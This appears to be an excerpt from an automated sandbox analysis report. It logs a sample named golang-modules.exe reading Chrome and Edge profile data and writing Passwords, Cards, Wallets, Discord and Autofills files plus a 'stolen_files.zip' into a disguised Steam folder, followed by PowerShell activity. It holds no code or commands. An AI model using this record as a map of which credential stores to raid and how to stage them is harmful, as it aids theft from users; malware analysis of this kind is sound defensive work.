Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Videos VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Videos\Captures VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Videos\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Desktop\AQRFEVRTGL VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Documents\AQRFEVRTGL VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Downloads\autoit-v3-setup.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Temp\790029589bf7a91c8f12fb0bf5bd9c03cgvRn7 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Temp\790029589bf7a91c8f12fb0bf5bd9c03cgvRn7 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Temp\790029589bf7a91c8f12fb0bf5bd9c03cgvRn7 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\edge\Updater VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web.db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web.db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Wallets VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Discord VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Autofills VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Autofills\Autofills.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Autofills\Autofills.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Autofills VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Cards VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Passwords VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Autofills\Autofills.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Autofills\Autofills.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Autofills VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Cards\Cards.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Cards\Cards.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Cards VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\debug.log VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\debug.log VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Discord\discord.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Discord\discord.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Discord VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Passwords\Passwords.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Passwords\Passwords.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Passwords VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Serial-Check.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Serial-Check.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\stolen_files.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\stolen_files.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Discord\discord.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Discord\discord.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Passwords\Passwords.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Passwords\Passwords.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Autofills VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Autofills\Autofills.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Autofills\Autofills.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Wallets VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849\Wallets VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeQueries volume information: C:\ProgramData\Steam\Launcher\EN-887849.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
